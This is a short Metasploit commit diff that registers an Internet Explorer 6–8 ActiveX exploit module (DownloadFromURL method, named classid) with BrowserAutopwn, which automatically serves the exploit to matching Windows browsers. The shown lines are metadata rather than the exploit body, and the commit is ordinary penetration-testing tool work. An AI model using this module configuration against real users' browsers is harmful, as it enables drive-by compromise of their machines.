Added BrowserAutopwn info

bug/bundler_fix
jvazquez-r7 2013-01-08 19:53:34 +01:00
parent 0e475dfce1
commit 52982c0785
1 changed files with 12 additions and 0 deletions

View File

@ -13,6 +13,18 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:rank => NormalRanking,
:classid => "{E01DF79C-BE0C-4999-9B13-B5F7B2306E9B}",
:method => "DownloadFromURL"
})
def initialize(info={})
super(update_info(info,